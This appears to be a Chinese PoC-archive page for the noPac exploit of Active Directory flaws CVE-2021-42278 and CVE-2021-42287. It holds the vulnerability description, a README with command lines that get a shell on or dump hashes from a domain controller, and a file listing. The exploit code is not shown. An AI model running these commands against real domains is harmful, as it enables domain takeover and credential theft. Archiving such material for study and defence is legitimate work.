支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: 6b7b2ad9a494cde2e39a2e4da363515373771e01

来源
关联漏洞
标题:Microsoft Windows Active Directory 输入验证错误漏洞 (CVE-2021-42278)
Description:Microsoft Windows Active Directory是美国微软(Microsoft)公司的一个负责架构中大型网络环境的集中式目录管理服务。存储有关网络上对象的信息,并使管理员和用户可以轻松查找和使用这些信息。 Microsoft Windows Active Directory存在输入验证错误漏洞。以下产品和版本受到影响:Windows Server 2012 R2 (Server Core installation),Windows Server 2019,Windows Server
Description
Exploiting CVE-2021-42278 and CVE-2021-42287
介绍
# noPac
Exploiting CVE-2021-42278 and CVE-2021-42287 <br>
原项目noPac在实现上可能有点问题,导致在本地没有打通,于是参考sam-the-admin项目进行修改。

# 使用
```
pip3 install -r requirements.txt
# GetShell
python3 exp.py "domain/Username:Passw0rd" -dc-ip 192.168.0.254 -shell
# DumpHash
python3 exp.py "domain/Username:Passw0rd" -dc-ip 192.168.0.254 -dump
```


# 修改
- 修改了原版作者在Kali下的smbexec等执行路径问题
- 修改模拟上线主机名特征


# 参考
https://github.com/cube0x0/noPac <br>
https://github.com/WazeHell/sam-the-admin
文件快照

[4.0K] /data/pocs/6b7b2ad9a494cde2e39a2e4da363515373771e01 ├── [8.0K] exp.py ├── [ 597] README.md ├── [ 16] requirements.txt ├── [ 20K] secretsdump.py ├── [ 16K] smbexec.py └── [4.0K] utils ├── [ 10K] addcomputer.py ├── [ 13K] helper.py └── [ 31K] S4U2self.py 1 directory, 8 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。